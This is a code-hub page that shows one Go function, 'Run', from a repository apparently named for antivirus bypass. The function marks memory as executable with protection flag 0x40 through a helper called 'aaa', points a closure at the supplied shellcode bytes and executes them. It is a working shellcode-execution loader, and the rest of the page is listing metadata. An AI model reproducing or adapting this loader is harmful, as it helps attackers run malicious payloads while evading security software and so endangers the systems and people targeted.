MCPcopy Create free account
hub / github.com/TideSec/GoBypassAV / Run

Function Run

SandBox/main.go:188–197  ·  view source on GitHub ↗
(sc []byte)

Source from the content-addressed store, hash-verified

186}
187
188func Run(sc []byte) {
189 fly := func() {}
190 var xx uint32
191 if !aaa(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&fly))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&xx)) {
192 }
193 **(**uintptr)(unsafe.Pointer(&fly)) = *(*uintptr)(unsafe.Pointer(&sc))
194 var yy uint32
195 aaa(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&yy))
196 fly()
197}
198
199func ScFromHex(scHex string) []byte{
200 var charcode []byte

Callers 1

mainFunction · 0.85

Calls 1

aaaFunction · 0.85

Tested by

no test coverage detected